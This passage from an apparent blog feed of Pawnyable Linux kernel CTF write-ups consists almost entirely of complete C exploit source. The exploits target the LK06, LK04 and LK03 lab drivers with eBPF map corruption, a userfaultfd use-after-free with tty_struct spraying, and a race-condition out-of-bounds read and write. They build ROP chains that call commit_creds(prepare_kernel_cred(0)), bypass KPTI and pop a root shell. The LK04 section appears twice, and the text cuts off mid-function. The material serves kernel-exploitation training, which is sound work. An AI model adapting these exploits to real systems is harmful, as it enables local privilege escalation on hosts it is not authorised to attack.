(socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr}; write(socks[1], buf, sizeof(buf)); bpf_map_lookup(mapfd, 0, &amp;map_val); close(socks[0]); close(socks[1]); close(progfd); return map_val; } uint64_t jit_addr = 0; int main() { srand(time(NULL)); char verifier_log[0x10000]; make_corrupted_map(); find_corrupted_map_and_leak_bpf_map_addr(); if (corrupted_map_fd == 0) { puts(&#34;[-] Failed to find corrupted bpf_map&#34;); return -1; } printf(&#34;[+] mapfd: %d\n&#34;, mapfd); printf(&#34;[+] corrupted_map_fd: %d\n&#34;, corrupted_map_fd); printf(&#34;[+] jit_addr: 0x%016lx\n&#34;, jit_addr); get_enter_to_continue(&#34;Press enter to exit(cause kernel crash)...&#34;); return 0; }</code></pre></div> <h2 id="refernece">Refernece</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/LK06/ebpf.html">https://pawnyable.cafe/linux-kernel/LK06/ebpf.html</a></li> <li><a href="https://pawnyable.cafe/linux-kernel/LK06/verifier.html">https://pawnyable.cafe/linux-kernel/LK06/verifier.html</a></li> <li><a href="https://pawnyable.cafe/linux-kernel/LK06/exploit.html">https://pawnyable.cafe/linux-kernel/LK06/exploit.html</a></li> </ul> /posts/kernel/pawnyable/pawnyable_lk04/ Thu, 16 Jan 2025 07:31:14 +0000 /posts/kernel/pawnyable/pawnyable_lk04/ <hr> <h2 id="lk04-fleckvieh">LK04: Fleckvieh</h2> <h3 id="using-userfaultfd">Using userfaultfd</h3> <div class="collapsable-code"> <input id="792564831" type="checkbox" checked /> <label for="792564831"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_userfaultfd_and_tty_struct.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;linux/userfaultfd.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; #define VULN_DEVICE_NAME &#34;fleckvieh&#34; #define VULN_DEV_CMD_ADD 0xf1ec0001 #define VULN_DEV_CMD_DEL 0xf1ec0002 #define VULN_DEV_CMD_GET 0xf1ec0003 #define VULN_DEV_CMD_SET 0xf1ec0004 #define VULN_DEV_MAX_SIZE 0x1000 #define KERNEL_BASE 0xffffffff81000000 #define TTY_STRUCT_MAGIC 0x100005401llu #define TTY_STRUCT_OPS_OFFSET (0xffffffff81c3c3c0 - KERNEL_BASE) #define PUSH_RDX_CMP_EAX_POP_RSP_RBP_OFFSET (0xffffffff8109b13a - KERNEL_BASE) #define PUSH_RDX_CMP_EAX_POP_RSP_RBP \ (kernel_base + PUSH_RDX_CMP_EAX_POP_RSP_RBP_OFFSET) #define POP_RDI_OFFSET (0xffffffff8109b0ed - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff810729d0 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff81022fe3 - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff81654bdb - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff81072830 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) void fatal(const char* msg) { perror(msg); exit(-1); } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%016lx, user_ss: 0x%016lx, user_sp: 0x%016lx, &#34; &#34;user_rflags: &#34; &#34;0x%016lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } int register_uffd(void* addr, size_t len, void* (*handler)(void*)) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; pthread_t th; int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK); uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &amp;uffdio_api) &lt; 0) { fatal(&#34;ioctl(UFFDIO_API)&#34;); } uffdio_register.range.start = (uint64_t)addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &amp;uffdio_register) &lt; 0) { fatal(&#34;ioctl(UFFDIO_REGISTER)&#34;); } if (pthread_create(&amp;th, NULL, handler, (void*)(uint64_t)uffd) &lt; 0) { fatal(&#34;pthread_create&#34;); } return uffd; } typedef struct { int id; size_t size; char* data; } request_t; int vuln_fd = -1; long vuln_blob_add(size_t size, void* data) { request_t req = {.id = 0, .size = size, .data = data}; return ioctl(vuln_fd, VULN_DEV_CMD_ADD, &amp;req); } long vuln_blob_del(int id) { request_t req = {.id = id, .size = 0, .data = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_DEL, &amp;req); } long vuln_blob_get(int id, size_t size, void* data) { request_t req = {.id = id, .size = size, .data = data}; return ioctl(vuln_fd, VULN_DEV_CMD_GET, &amp;req); } long vuln_blob_set(int id, size_t size, void* data) { request_t req = {.id = id, .size = size, .data = data}; return ioctl(vuln_fd, VULN_DEV_CMD_SET, &amp;req); } cpu_set_t target_cpu; char char_buf[VULN_DEV_MAX_SIZE]; uint64_t* uint64_buf = (uint64_t*)char_buf; int vuln_id = -1; enum vuln_operation_type { NONE = 0, UAF_READ = 1, UAF_WRITE = 2, } vuln_operation_type; const char* vuln_spray_dev_name; int vuln_spray_flags; int vuln_spray_fds[0x1000]; int vuln_spray_cnt; static void* userfault_handler(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; puts(&#34;[*] userfault_handler: waiting for page fault...&#34;); pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal(&#34;userfault_handler: msg.event != UFFD_EVENT_PAGEFAULT&#34;); } printf(&#34;[*] userfault_handler: addr=0x%llx, flag=0x%llx\n&#34;, msg.arg.pagefault.address, msg.arg.pagefault.flags); switch (vuln_operation_type) { case NONE: break; case UAF_READ: vuln_blob_del(vuln_id); for (int i = 0; i &lt; vuln_spray_cnt; ++i) { vuln_spray_fds[i] = open(vuln_spray_dev_name, vuln_spray_flags); if (vuln_spray_fds[i] &lt; 0) { fatal(&#34;userfault_handler: open(vuln_spray_dev_name)&#34;); } } copy.src = (uint64_t)page; break; case UAF_WRITE: vuln_blob_del(vuln_id); for (int i = 0; i &lt; vuln_spray_cnt; ++i) { vuln_spray_fds[i] = open(vuln_spray_dev_name, vuln_spray_flags); if (vuln_spray_fds[i] &lt; 0) { fatal(&#34;userfault_handler: open(vuln_spray_dev_name)&#34;); } } copy.src = (uint64_t)char_buf; break; default: fatal(&#34;switch(vuln_operation_type)&#34;); break; } copy.dst = (uint64_t)msg.arg.pagefault.address; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } } return NULL; } void close_sprays() { for (int i = 0; i &lt; vuln_spray_cnt; ++i) { close(vuln_spray_fds[i]); vuln_spray_fds[i] = 0; } } void uaf_read(void* out, size_t read_size, size_t chunk_size, const char* spray_dev_name, int spray_cnt, int spray_flags) { vuln_operation_type = UAF_READ; vuln_spray_dev_name = spray_dev_name; vuln_spray_cnt = spray_cnt; vuln_spray_flags = spray_flags; void* page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;uaf_read: mmap&#34;); } register_uffd(page, 0x1000, userfault_handler); vuln_id = vuln_blob_add(chunk_size, char_buf); vuln_blob_get(vuln_id, read_size, page); vuln_operation_type = NONE; memcpy(out, page, read_size); munmap(page, 0x1000); } void uaf_write(void* src, size_t write_size, size_t chunk_size, const char* spray_dev_name, int spray_cnt, int spray_flags) { vuln_operation_type = UAF_WRITE; vuln_spray_dev_name = spray_dev_name; vuln_spray_cnt = spray_cnt; vuln_spray_flags = spray_flags; void* page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;uaf_read: mmap&#34;); } register_uffd(page, 0x1000, userfault_handler); vuln_id = vuln_blob_add(chunk_size, char_buf); memcpy(char_buf, src, write_size); vuln_blob_set(vuln_id, write_size, page); vuln_operation_type = NONE; munmap(page, 0x1000); } uint64_t kernel_base, heap_addr; int main() { CPU_ZERO(&amp;target_cpu); CPU_SET(0, &amp;target_cpu); if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } save_state(); vuln_fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (vuln_fd &lt; 0) { fatal(&#34;open vuln_device&#34;); } uaf_read(char_buf, 0x20, 0x400, &#34;/dev/ptmx&#34;, 0x10, O_RDONLY | O_NOCTTY); kernel_base = uint64_buf[3] - TTY_STRUCT_OPS_OFFSET; if (kernel_base &lt; 0xffffffff81000000 || kernel_base &gt; 0xffffffffc0000000) { fatal(&#34;kernel_base&#34;); } printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); close_sprays(); uaf_read(char_buf, 0x50, 0x400, &#34;/dev/ptmx&#34;, 0x10, O_RDONLY | O_NOCTTY); heap_addr = uint64_buf[9] - 0x48; printf(&#34;[+] heap_addr: 0x%016lx\n&#34;, heap_addr); close_sprays(); void* rop_buf = malloc(0x1000); uint64_t* rop = (uint64_t*)rop_buf; *rop++ = PUSH_RDX_CMP_EAX_POP_RSP_RBP; *rop++ = POP_RDI; *rop++ = 0; *rop++ = PREPARE_KERNEL_CRED; *rop++ = POP_RCX; *rop++ = 0; *rop++ = MOV_RDI_RAX_REP; *rop++ = COMMIT_CREDS; *rop++ = BYPASS_KPTI; *rop++ = 0xdeadbeefcafe0000; *rop++ = 0xdeadbeefcafe0001; *rop++ = (uint64_t)get_shell; *rop++ = (uint64_t)user_cs; *rop++ = (uint64_t)user_rflags; *rop++ = (uint64_t)user_sp; *rop++ = (uint64_t)user_ss; for (int i = 0; i &lt; 0x100; ++i) { vuln_blob_add(0x400, rop_buf); } uint64_buf[0] = TTY_STRUCT_MAGIC; uint64_buf[3] = heap_addr - 0x0c * 8; uaf_write(char_buf, 0x20, 0x400, &#34;/dev/ptmx&#34;, 0x10, O_RDONLY | O_NOCTTY); for (int i = 0; i &lt; 0x10; ++i) { ioctl(vuln_spray_fds[i], 0, heap_addr); } close(vuln_fd); return 0; }</code></pre></div> <h3 id="using-fuse">Using FUSE</h3> <p>Since I cannot build test code with FUSE2 and the flow of exploit is same when using userfaultfd, I skip this part.</p> <hr> <h2 id="lk04-fleckvieh">LK04: Fleckvieh</h2> <h3 id="using-userfaultfd">Using userfaultfd</h3> <div class="collapsable-code"> <input id="792564831" type="checkbox" checked /> <label for="792564831"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_userfaultfd_and_tty_struct.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;linux/userfaultfd.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; #define VULN_DEVICE_NAME &#34;fleckvieh&#34; #define VULN_DEV_CMD_ADD 0xf1ec0001 #define VULN_DEV_CMD_DEL 0xf1ec0002 #define VULN_DEV_CMD_GET 0xf1ec0003 #define VULN_DEV_CMD_SET 0xf1ec0004 #define VULN_DEV_MAX_SIZE 0x1000 #define KERNEL_BASE 0xffffffff81000000 #define TTY_STRUCT_MAGIC 0x100005401llu #define TTY_STRUCT_OPS_OFFSET (0xffffffff81c3c3c0 - KERNEL_BASE) #define PUSH_RDX_CMP_EAX_POP_RSP_RBP_OFFSET (0xffffffff8109b13a - KERNEL_BASE) #define PUSH_RDX_CMP_EAX_POP_RSP_RBP \ (kernel_base + PUSH_RDX_CMP_EAX_POP_RSP_RBP_OFFSET) #define POP_RDI_OFFSET (0xffffffff8109b0ed - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff810729d0 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff81022fe3 - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff81654bdb - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff81072830 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) void fatal(const char* msg) { perror(msg); exit(-1); } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%016lx, user_ss: 0x%016lx, user_sp: 0x%016lx, &#34; &#34;user_rflags: &#34; &#34;0x%016lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } int register_uffd(void* addr, size_t len, void* (*handler)(void*)) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; pthread_t th; int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK); uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &amp;uffdio_api) &lt; 0) { fatal(&#34;ioctl(UFFDIO_API)&#34;); } uffdio_register.range.start = (uint64_t)addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &amp;uffdio_register) &lt; 0) { fatal(&#34;ioctl(UFFDIO_REGISTER)&#34;); } if (pthread_create(&amp;th, NULL, handler, (void*)(uint64_t)uffd) &lt; 0) { fatal(&#34;pthread_create&#34;); } return uffd; } typedef struct { int id; size_t size; char* data; } request_t; int vuln_fd = -1; long vuln_blob_add(size_t size, void* data) { request_t req = {.id = 0, .size = size, .data = data}; return ioctl(vuln_fd, VULN_DEV_CMD_ADD, &amp;req); } long vuln_blob_del(int id) { request_t req = {.id = id, .size = 0, .data = NULL}; return ioctl(vuln_fd, VULN_DEV_CMD_DEL, &amp;req); } long vuln_blob_get(int id, size_t size, void* data) { request_t req = {.id = id, .size = size, .data = data}; return ioctl(vuln_fd, VULN_DEV_CMD_GET, &amp;req); } long vuln_blob_set(int id, size_t size, void* data) { request_t req = {.id = id, .size = size, .data = data}; return ioctl(vuln_fd, VULN_DEV_CMD_SET, &amp;req); } cpu_set_t target_cpu; char char_buf[VULN_DEV_MAX_SIZE]; uint64_t* uint64_buf = (uint64_t*)char_buf; int vuln_id = -1; enum vuln_operation_type { NONE = 0, UAF_READ = 1, UAF_WRITE = 2, } vuln_operation_type; const char* vuln_spray_dev_name; int vuln_spray_flags; int vuln_spray_fds[0x1000]; int vuln_spray_cnt; static void* userfault_handler(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; puts(&#34;[*] userfault_handler: waiting for page fault...&#34;); pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal(&#34;userfault_handler: msg.event != UFFD_EVENT_PAGEFAULT&#34;); } printf(&#34;[*] userfault_handler: addr=0x%llx, flag=0x%llx\n&#34;, msg.arg.pagefault.address, msg.arg.pagefault.flags); switch (vuln_operation_type) { case NONE: break; case UAF_READ: vuln_blob_del(vuln_id); for (int i = 0; i &lt; vuln_spray_cnt; ++i) { vuln_spray_fds[i] = open(vuln_spray_dev_name, vuln_spray_flags); if (vuln_spray_fds[i] &lt; 0) { fatal(&#34;userfault_handler: open(vuln_spray_dev_name)&#34;); } } copy.src = (uint64_t)page; break; case UAF_WRITE: vuln_blob_del(vuln_id); for (int i = 0; i &lt; vuln_spray_cnt; ++i) { vuln_spray_fds[i] = open(vuln_spray_dev_name, vuln_spray_flags); if (vuln_spray_fds[i] &lt; 0) { fatal(&#34;userfault_handler: open(vuln_spray_dev_name)&#34;); } } copy.src = (uint64_t)char_buf; break; default: fatal(&#34;switch(vuln_operation_type)&#34;); break; } copy.dst = (uint64_t)msg.arg.pagefault.address; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } } return NULL; } void close_sprays() { for (int i = 0; i &lt; vuln_spray_cnt; ++i) { close(vuln_spray_fds[i]); vuln_spray_fds[i] = 0; } } void uaf_read(void* out, size_t read_size, size_t chunk_size, const char* spray_dev_name, int spray_cnt, int spray_flags) { vuln_operation_type = UAF_READ; vuln_spray_dev_name = spray_dev_name; vuln_spray_cnt = spray_cnt; vuln_spray_flags = spray_flags; void* page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;uaf_read: mmap&#34;); } register_uffd(page, 0x1000, userfault_handler); vuln_id = vuln_blob_add(chunk_size, char_buf); vuln_blob_get(vuln_id, read_size, page); vuln_operation_type = NONE; memcpy(out, page, read_size); munmap(page, 0x1000); } void uaf_write(void* src, size_t write_size, size_t chunk_size, const char* spray_dev_name, int spray_cnt, int spray_flags) { vuln_operation_type = UAF_WRITE; vuln_spray_dev_name = spray_dev_name; vuln_spray_cnt = spray_cnt; vuln_spray_flags = spray_flags; void* page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;uaf_read: mmap&#34;); } register_uffd(page, 0x1000, userfault_handler); vuln_id = vuln_blob_add(chunk_size, char_buf); memcpy(char_buf, src, write_size); vuln_blob_set(vuln_id, write_size, page); vuln_operation_type = NONE; munmap(page, 0x1000); } uint64_t kernel_base, heap_addr; int main() { CPU_ZERO(&amp;target_cpu); CPU_SET(0, &amp;target_cpu); if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } save_state(); vuln_fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (vuln_fd &lt; 0) { fatal(&#34;open vuln_device&#34;); } uaf_read(char_buf, 0x20, 0x400, &#34;/dev/ptmx&#34;, 0x10, O_RDONLY | O_NOCTTY); kernel_base = uint64_buf[3] - TTY_STRUCT_OPS_OFFSET; if (kernel_base &lt; 0xffffffff81000000 || kernel_base &gt; 0xffffffffc0000000) { fatal(&#34;kernel_base&#34;); } printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); close_sprays(); uaf_read(char_buf, 0x50, 0x400, &#34;/dev/ptmx&#34;, 0x10, O_RDONLY | O_NOCTTY); heap_addr = uint64_buf[9] - 0x48; printf(&#34;[+] heap_addr: 0x%016lx\n&#34;, heap_addr); close_sprays(); void* rop_buf = malloc(0x1000); uint64_t* rop = (uint64_t*)rop_buf; *rop++ = PUSH_RDX_CMP_EAX_POP_RSP_RBP; *rop++ = POP_RDI; *rop++ = 0; *rop++ = PREPARE_KERNEL_CRED; *rop++ = POP_RCX; *rop++ = 0; *rop++ = MOV_RDI_RAX_REP; *rop++ = COMMIT_CREDS; *rop++ = BYPASS_KPTI; *rop++ = 0xdeadbeefcafe0000; *rop++ = 0xdeadbeefcafe0001; *rop++ = (uint64_t)get_shell; *rop++ = (uint64_t)user_cs; *rop++ = (uint64_t)user_rflags; *rop++ = (uint64_t)user_sp; *rop++ = (uint64_t)user_ss; for (int i = 0; i &lt; 0x100; ++i) { vuln_blob_add(0x400, rop_buf); } uint64_buf[0] = TTY_STRUCT_MAGIC; uint64_buf[3] = heap_addr - 0x0c * 8; uaf_write(char_buf, 0x20, 0x400, &#34;/dev/ptmx&#34;, 0x10, O_RDONLY | O_NOCTTY); for (int i = 0; i &lt; 0x10; ++i) { ioctl(vuln_spray_fds[i], 0, heap_addr); } close(vuln_fd); return 0; }</code></pre></div> <h3 id="using-fuse">Using FUSE</h3> <p>Since I cannot build test code with FUSE2 and the flow of exploit is same when using userfaultfd, I skip this part.</p> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/LK04/uffd.html">https://pawnyable.cafe/linux-kernel/LK04/uffd.html</a></li> <li><a href="https://pawnyable.cafe/linux-kernel/LK04/fuse.html">https://pawnyable.cafe/linux-kernel/LK04/fuse.html</a></li> </ul> /posts/kernel/pawnyable/pawnyable_lk03/ Tue, 14 Jan 2025 09:31:17 +0000 /posts/kernel/pawnyable/pawnyable_lk03/ <hr> <h2 id="lk03-dexter">LK03 (Dexter)</h2> <div class="collapsable-code"> <input id="784519362" type="checkbox" checked /> <label for="784519362"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_seq_operations_without_smap.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;pthread.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define VULN_DEV_DEVICE_NAME &#34;dexter&#34; #define VULN_DEV_BUFFER_SIZE 0x20 #define VULN_DEV_CMD_GET 0xdec50001 #define VULN_DEV_CMD_SET 0xdec50002 #define KERNEL_BASE 0xffffffff81000000 #define SEQ_OPERATIONS_START 0xffffffff81170f80 #define SEQ_OPERATIONS_START_OFFSET (SEQ_OPERATIONS_START - KERNEL_BASE) #define FAKE_STACK_ADDRESS (0xf6000000) #define MOV_ESP_0xf6000000_OFFSET (0xffffffff81520224 - KERNEL_BASE) #define MOV_ESP_0xf6000000 (kernel_base + MOV_ESP_0xf6000000_OFFSET) #define POP_RDI_OFFSET (0xffffffff8109b0cd - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff810729b0 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff8110d88b - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8163d0ab - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff81072810 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) static void fatal(const char* msg) { perror(msg); exit(-1); } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%016lx, user_ss: 0x%016lx, user_sp: 0x%016lx, &#34; &#34;user_rflags: &#34; &#34;0x%016lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } typedef struct { char* ptr; size_t len; } request_t; static int vuln_dev_fd = -1; static request_t vuln_dev_req = { 0, }; static int vuln_dev_set(void* ptr, size_t len) { vuln_dev_req.ptr = ptr; vuln_dev_req.len = len; return ioctl(vuln_dev_fd, VULN_DEV_CMD_SET, &amp;vuln_dev_req); } static int vuln_dev_get(void* ptr, size_t len) { vuln_dev_req.ptr = ptr; vuln_dev_req.len = len; return ioctl(vuln_dev_fd, VULN_DEV_CMD_GET, &amp;vuln_dev_req); } static int race_success = 0; static void* vuln_dev_race(void* arg) { const size_t len = (size_t)arg; while (!race_success) { vuln_dev_req.len = len; usleep(1); } return NULL; } static void vuln_dev_oob_read(void* out, size_t len) { if (len &lt;= VULN_DEV_BUFFER_SIZE) { vuln_dev_get(out, len); return; } pthread_t th; race_success = 0; const uint64_t cur_rand_val = 0xdeadbeefcafebebe + rand(); *(uint64_t*)(out + VULN_DEV_BUFFER_SIZE) = cur_rand_val; pthread_create(&amp;th, NULL, &amp;vuln_dev_race, (void*)len); while (!race_success) { if (vuln_dev_get(out, VULN_DEV_BUFFER_SIZE)) { continue; } if (*(uint64_t*)(out + VULN_DEV_BUFFER_SIZE) != cur_rand_val) { race_success = 1; } } pthread_join(th, NULL); } static void vuln_dev_oob_write(void* data, size_t len) { if (len &lt;= VULN_DEV_BUFFER_SIZE) { vuln_dev_set(data, len); return; } pthread_t th; race_success = 0; const uint64_t cur_rand_val = 0xdeadbeefcafebebe + rand(); void* tmp = malloc(len); *(uint64_t*)(tmp + VULN_DEV_BUFFER_SIZE) = cur_rand_val; pthread_create(&amp;th, NULL, &amp;vuln_dev_race, (void*)len); while (!race_success) { if (vuln_dev_set(data, VULN_DEV_BUFFER_SIZE)) { continue; } while (1) { if (vuln_dev_get(tmp, VULN_DEV_BUFFER_SIZE)) { continue; } if (*(uint64_t*)(tmp + VULN_DEV_BUFFER_SIZE) 